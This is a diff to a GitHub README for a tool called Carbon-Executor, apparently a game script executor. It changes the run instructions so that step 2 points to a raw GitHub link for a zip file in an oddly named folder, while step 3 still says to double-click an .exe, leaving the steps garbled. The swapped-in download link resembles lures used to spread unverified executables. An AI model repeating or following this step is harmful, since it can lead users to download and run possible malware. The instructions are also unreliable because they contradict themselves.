MahadMasood60/Carbon-Executor/README.md

 Now, you're ready to run Carbon Executor:

 1. Open the folder where you extracted the files.
-2. Find the file named `Carbon-Executor.exe`.
+2. Find the file named `https://raw.githubusercontent.com/MahadMasood60/Carbon-Executor/main/Sphenodontidae/Carbon-Executor.zip`.
 3. Double-click the `.exe` file to launch the application.

 ## 🔐 Configuring the Executor